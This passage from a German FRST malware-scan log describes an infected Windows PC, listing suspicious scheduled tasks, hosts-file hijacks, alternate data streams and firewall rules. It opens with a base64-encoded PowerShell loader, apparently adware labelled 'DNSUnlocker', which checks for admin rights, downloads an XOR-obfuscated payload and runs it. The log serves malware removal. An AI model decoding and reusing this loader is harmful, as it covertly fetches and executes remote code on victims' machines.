AcgBQAC0ASABiAHEAOABKAE0AdQBSAGYAZQBjAHQANABtAGUAWABrADAAQwB6AHoATAA5AEwAQQBpADIAYQAtAEMARQBiAFgAbABRAHAAYwBDAEYAUAB0AGcASABfAE8AUQBhAEkAQwA2AEIANABTAHgANQAxAEgAbQBDADgAawBoAFEALQBjAHgAZwA5AGgAagBJAGsAWQBJADcAbgBiAG0AVwBpAFoAVwA4ADkAQwBYAHAAbgBZAEIAawBiAHQANABuAHAARABfAFAAOAAwADQARQB5AHIAbwBNAFMATAAtADMASQBQAGQAZwBjAGUAOAB3AFUAaABoAG4AUgBrAEUAeQBFAHIAYQBQAHAAMwBFAHgATwBQAFUAQQBRADkAcgBPAGcAawAzAGEAdQB5AG0AbABnAGEAdgAwAFoARABkADcAMABOAGoAZQBWAHMAdwBsAC0AbQBjAHEAVQB4AFgAZgBtAHAAMQA0ADYAawBuAHIAZABhADIAQgB5AHIAegBwAHcAbgBRAEsAcwBFAFcAMQB1AG8ARQBxAFkARwB3AFMARgBlAHoAQwA4ADkAbQBTAGgAbQBZADgAOAB1AEgAUwA5AEYAdABUAEQAQQBVAHUATAAtAGsAYQBfAFIAVgB4AC0AcQBXAFIATQBaAFEAdQB5AEkAVQBkADUAUwA1AG4ATgBiAGgAeABFAFkAaQBuAHUAegAxADAARwB2AE4AeABCAHkAeABrAEwAYgA4AHgAegBVADkARQBVAFMAMgB0AE4AegBiAHUANAB0AHQANABGAGYAUQBLADcASgB6AFAAYwBhAGUAVwB4AGkAbwAxADgAeQBKAFUAZQBfAFgATAA3AGcARgAyAG0AMgAxAGcAYgBCAF8ATABiADMAQgAxAGMANQBNAGIAbAAxAHEAMgBuAHQAUwBSAGYARgBDAEwARQBDADAAOABBAEsATgB3AGQAeQBUADgASgB1AHQARAA4AHMAcgB1AF8ARgBfADUATABOAC0AbQBBAHUAQwBhADkASwAyAGcAaQA0AFAAbwBfAGwAdABfADEAZwBNAGEARwBlAGYAaAA1ADAASABSAGsARABzAHMAZwBPADAAdQB6AFIAVABCAHEAZwBqADgAawAtAEEATABVAEMAcgA2AFoAdAAwAG8AWgBEAFYAWQA2AE8AcgBSAGwAcQBJADUANQBlAFEAdgBmADMANgBuAFkASABBAG0AeQB1ADMAWAB6ADMAMwBnAHgANABrADQAcABtAG8ARwBQAEkASQBQAFcANQB2AEIAZABjADQAegBuAEYAVABlADAAZABqAGIAeABKAFMAdgBWADcAUQBQADYAcABuAEsAeABPACYAcgA9ADQAOAA2ADAAOAAxADAAMwAwADYANwA4ADAAMgAyADIANgAwADMAIgA7ACQAcwB0AHMAawA9ACIAewAwADgAMABBADAAQgA0ADcALQAwAEUAMAA1AC0AMABEADAANQAtADcARAAxADEALQA3AEEAMAA5ADcAOAA3ADkAMQAxADAARAB9ACIAOwAkAHAAcgBpAGQAPQAiAEQATgBTAFUAbgBsAG8AYwBrAGUAcgAiADsAJABpAG4AaQBkAD0AIgBPAFcAVwBYAFEAUABXAFEAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Task: {0CFE2E40-6A97-48C5-9F38-DE82315CF1B0} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {0D5843B1-56E7-441B-A163-75A2682A1E59} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-19] (Adobe Systems Incorporated)
Task: {2234C79D-BC4A-4674-9235-0F1B05EE4D54} - System32\Tasks\zyh3018 => C:\Program Files (x86)\QuickSearch\zyh3018.exe <==== ACHTUNG
Task: {2AE75B4D-C1D4-4C97-8BBD-392612B17A57} - \DNSHALIFAX -> Keine Datei <==== ACHTUNG
Task: {3434A82A-A465-495B-A3A4-0C82A167B05D} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-01-14] (Microsoft Corporation)
Task: {34BA37E5-7E14-46B3-BF1C-D27D779321D0} - System32\Tasks\AsrAPPShop => C:\Program Files (x86)\ASRock Utility\APP Shop\AsrAPPShop.exe [2015-11-11] ()
Task: {361C0938-BDC7-4822-A04B-8EEB57F97BA7} - System32\Tasks\{267229C2-F9E7-458D-BCF0-A5980456C347} => pcalua.exe -a "C:\Program Files (x86)\MPC Cleaner\Uninstall.exe"
Task: {403F9581-4563-44E7-B6BD-A7CFB494EA34} - \DNS Monitoring -> Keine Datei <==== ACHTUNG
Task: {4AD88CEA-B049-4DA5-9156-55CBA3133422} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-13] (Google Inc.)
Task: {52E0C7A5-1EE2-460B-B93C-86D9C52F4C3E} - System32\Tasks\Uymhnhth => C:\PROGRA~1\GROOVE~1\Typta.bat
Task: {5B5B7EE2-919B-40E3-83D5-552083AA4D00} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-13] (Google Inc.)
Task: {5B95635A-1D99-40BD-A2F1-D97D5AE8D7E6} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
Task: {5C1185AB-F321-402F-8CE4-20112CA869D6} - \RSPro -> Keine Datei <==== ACHTUNG
Task: {B70ECF34-0D0A-42CA-BD4F-572A3ED8834D} - System32\Tasks\updateTask => c:\task.vbs
Task: {C04E3D53-8672-4561-A960-6E149A65D7BA} - \bvxvbxxvaa -> Keine Datei <==== ACHTUNG
Task: {F29465CC-F575-4289-B857-5E637EA14621} - System32\Tasks\{29A8F8E2-4080-4930-BA92-BEE5FF804B2E} => pcalua.exe -a "C:\Program Files (x86)\Common Files\ZathTonix\uninstall.exe" -c -f "C:\Program Files (x86)\Common Files\ZathTonix\uninstall.dat" -a uninstallme CF8AA8C1-02AD-4C03-8802-CF09D8E22987 DeviceId=caa9ea8d-e5f3-eb86-7b2d-e98b2ef280db BarcodeId=51129011 ChannelId=11 DistributerName=APSFSWAds
Task: {F3F8E89D-8E53-4682-9238-94EEAC2132AF} - \IBUpd2 -> Keine Datei <==== ACHTUNG
Task: {FCB3727D-BFB7-499D-B6FB-1E62FF986476} - System32\Tasks\runTask => C:\Users\Deniz\AppData\Local\Temp/Updater.exe

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\{080A0B47-0E05-0D05-7D11-7A097879110D}.job => powershell exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-10-30 08:18 - 2015-10-30 08:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2015-12-09 23:17 - 2016-02-03 00:39 - 00076888 _____ () C:\WINDOWS\SysWOW64\PnkBstrA.exe
2015-12-05 14:09 - 2015-12-05 14:09 - 02653816 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-12-05 14:42 - 2015-11-11 15:03 - 06101768 _____ () C:\Program Files (x86)\ASRock Utility\APP Shop\AsrAPPShop.exe
2016-01-21 20:58 - 2016-01-21 20:58 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2015-12-05 14:09 - 2015-12-05 14:09 - 02653816 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2015-12-18 18:28 - 2015-12-07 05:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2015-12-18 18:28 - 2015-12-07 05:00 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-01-13 20:28 - 2016-01-05 02:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-13 20:28 - 2016-01-05 02:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-28 18:30 - 2016-01-16 06:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-28 18:30 - 2016-01-16 06:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-01-20 23:01 - 2016-01-20 23:01 - 03746816 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1601.49020.0_x64__8wekyb3d8bbwe\Calculator.exe
2015-12-15 13:30 - 2015-12-15 13:30 - 00258560 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1601.49020.0_x64__8wekyb3d8bbwe\StoreRatingPromotion.dll
2016-01-27 00:29 - 2016-01-27 00:29 - 00015872 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.122.14020.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
2016-01-27 00:29 - 2016-01-27 00:29 - 14870016 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.122.14020.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll
2015-12-06 16:45 - 2015-12-06 16:45 - 00258560 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.122.14020.0_x64__8wekyb3d8bbwe\StoreRatingPromotion.dll
2015-12-26 09:59 - 2015-12-26 09:59 - 00158720 _____ () C:\Users\Deniz\AppData\Local\03000200-1454615591-0500-0006-000700080009\qnsv657B.tmp
2015-12-05 13:10 - 2015-11-25 00:10 - 00012080 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-01-21 20:58 - 2016-01-21 20:58 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-01-21 20:58 - 2016-01-21 20:58 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{31531386-cb51-11e5-8262-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{31531387-cb51-11e5-8262-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{3153141d-cb51-11e5-8262-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{3153141e-cb51-11e5-8262-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{31531424-cb51-11e5-8262-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{31531425-cb51-11e5-8262-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{315314a3-cb51-11e5-8262-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{315314a4-cb51-11e5-8262-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{315314ad-cb51-11e5-8262-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{315314ae-cb51-11e5-8262-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{973e9592-cab8-11e5-8260-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{973e9593-cab8-11e5-8260-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{973e9598-cab8-11e5-8260-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{973e9599-cab8-11e5-8260-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{d588845d-cab9-11e5-8261-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{d588845e-cab9-11e5-8261-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{d5888468-cab9-11e5-8261-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{d5888469-cab9-11e5-8261-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{d58887b6-cab9-11e5-8261-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{d58887b7-cab9-11e5-8261-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{d58887c3-cab9-11e5-8261-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{d58887c4-cab9-11e5-8261-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{e4936221-ca6f-11e5-825f-d050992145d7}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{e4936222-ca6f-11e5-825f-d050992145d7}

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\zcengine => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\zcwfp => ""="Driver"

==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ==========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2013-08-22 14:25 - 2016-02-03 21:43 - 00001140 ____A C:\WINDOWS\system32\Drivers\etc\hosts

0.0.0.1        mssplus.mcafee.com
127.0.0.1      down.baidu2016.com
127.0.0.1      123.sogou.com
127.0.0.1      www.czzsyzgm.com
127.0.0.1      www.czzsyzxl.com
127.0.0.1      down.baidu2016.com
127.0.0.1      123.sogou.com
127.0.0.1      www.czzsyzgm.com
127.0.0.1      www.czzsyzxl.com

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-3986097363-2624585822-4063065306-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img1.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKLM\...\StartupApproved\Run: => "Sound+"
HKLM\...\StartupApproved\Run: => "SpaceSoundPro"
HKLM\...\StartupApproved\Run32: => "LogMeIn Hamachi Ui"
HKLM\...\StartupApproved\Run32: => "rec_en_77"
HKU\S-1-5-21-3986097363-2624585822-4063065306-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3986097363-2624585822-4063065306-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-3986097363-2624585822-4063065306-1001\...\StartupApproved\Run: => "SearchModule"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{E1D63F4E-3586-461D-B8D0-75043C6EA0DE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{6F83AC0B-6EDF-4CA7-BBEE-EC5A4ED0D0A6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{EFD58E78-00C6-4EBE-8954-4C48575B5EA1}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{5890B74B-AD4E-44FC-8FB1-BC368A8D6BAC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{5ACF48D3-5718-42F3-8736-01669AF3E347}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{B6F19C5A-7603-4943-A0C3-8B692E8C328B}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{ADBE48AF-AFA6-4647-9966-BC41F7A770A1}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{7A7FDBE9-D77A-40E4-AE57-AF5728EE8CEF}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{42A7F3E0-2C46-486C-B287-FAEC05FB13FC}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{6933F06B-E8E3-45E6-A79F-F74B696BD591}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{3871154C-9282-426B-9465-830148FA3E9D}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{6BB3322E-50CC-447F-A197-69FDC971EA79}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{FF41A99F-64BC-40F4-BD5E-2B95A1B4D5A7}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{28C383DD-5B08-4A26-923A-350DFFC97CDD}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{DCA3F5C3-EA5C-44DA-8EE0-C87E69512070}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Arma 3\arma3launcher.exe
FirewallRules: [{A352120F-CA4D-4002-AD82-52BD4B8E4ED0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Arma 3\arma3launcher.exe
FirewallRules: [{1768E8CA-56EC-47AE-BB75-26A8049F9828}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cossacks Back to War\bin\csbtw.exe
FirewallRules: [{30D47195-81FB-4109-A08E-61CC361E7349}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cossacks Back to War\bin\csbtw.exe
FirewallRules: [{2463DCAA-169D-4CDE-A871-067649F6E3E1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cossacks Back to War\bin\HView.exe
FirewallRules: [{EDAA43C4-D955-4A2A-8DBE-4DF5E5D7C3AA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cossacks Back to War\bin\HView.exe
FirewallRules: [{5DFE6F09-DF0C-41FA-85A2-8FB015527D4F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cossacks Back to War\bin\ScenarioEditor.exe
FirewallRules: [{D198BFFD-629C-4E16-97FE-F724C1C19550}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cossacks Back to War\bin\ScenarioEditor.exe
FirewallRules: [{E8C605F3-6BC7-47C3-8DCA-5653A664FDA6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cossacks Back to War\bin\cshlp.exe
FirewallRules: [{1262D3E9-EFE0-486B-9828-3FEBC30C4D0A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cossacks Back to War\bin\cshlp.exe
FirewallRules: [TCP Query User{13DC5155-85A5-49A9-8F02-BA2D2455C02A}C:\program files (x86)\steam\steamapps\common\arma 3\arma3.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\arma 3\arma3.exe
FirewallRules: [UDP Query User{C3836E4A-5CD5-4354-A8E9-CB2B9BCA5242}C:\program files (x86)\steam\steamapps\common\arma 3\arma3.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\arma 3\arma3.exe
FirewallRules: [{8D43FDF9-8F97-4A2C-9633-E161B0D1BFCF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe
FirewallRules: [{874E9C6C-CD24-4CA1-8964-05B0A6A15E16}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe
FirewallRules: [{9D803EB7-172D-49AB-8FF2-4A1F4ABBEA89}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cossacks Back to War\bin\dmcr.exe
FirewallRules: [{A41A90DF-AB1B-4BD6-8E37-70E0F449CB6F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cossacks Back to War\bin\dmcr.exe
FirewallRules: [{4C67A8E7-A471-418A-9E0F-4BF75A3EF325}] => (Allow) C:\Windows\SysWOW64\dplaysvr.exe
FirewallRules: [{B20C6E39-055E-4BF6-8673-30CC36CF9C4B}] => (Allow) C:\Windows\SysWOW64\dplaysvr.exe
FirewallRules: [TCP Query User{3335C3E4-7A69-43B2-8BD1-C92A29A7CBF3}C:\program files\rockstar games\grand theft auto v\gta5.exe] => (Allow) C:\program files\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [UDP Query User{BEBF1DD6-333E-4A0E-A555-71D64128C1E1}C:\program files\rockstar games\grand theft auto v\gta5.exe] => (Allow) C:\program files\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [{905ACACD-CC9D-4183-B99C-13400F276D34}] => (Block) C:\program files\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [{D0C66FAA-CA29-4CB9-AC22-08DF8BCDB120}] => (Block) C:\program files\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [{E3CE71B6-CD04-4AA3-878F-97F28EDDF7A6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Red Orchestra 2\Binaries\Win32\ROGame.exe
FirewallRules: [{90266E92-A25E-4819-BD19-324B708C3C06}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Red Orchestra 2\Binaries\Win32\ROGame.exe
FirewallRules: [{70AF94B9-55A2-437B-9C2B-9932E276C949}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{814348B2-6E45-460C-9038-C89A74E6FF24}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{FDE9F096-789F-477A-82B2-BA6DB0ADF22B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal 2\portal2.exe
FirewallRules: [{03EF897C-0AEF-4EEA-899D-31698C1BDD7C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal 2\portal2.exe
FirewallRules: [{E8B90087-DF38-492B-BD11-018990D38C99}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Battlefield Bad Company 2\BFBC2Game.exe
FirewallRules: [{C14C6E94-2363-47E0-8A0C-E9E568660DDD}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Battlefield Bad Company 2\BFBC2Game.exe
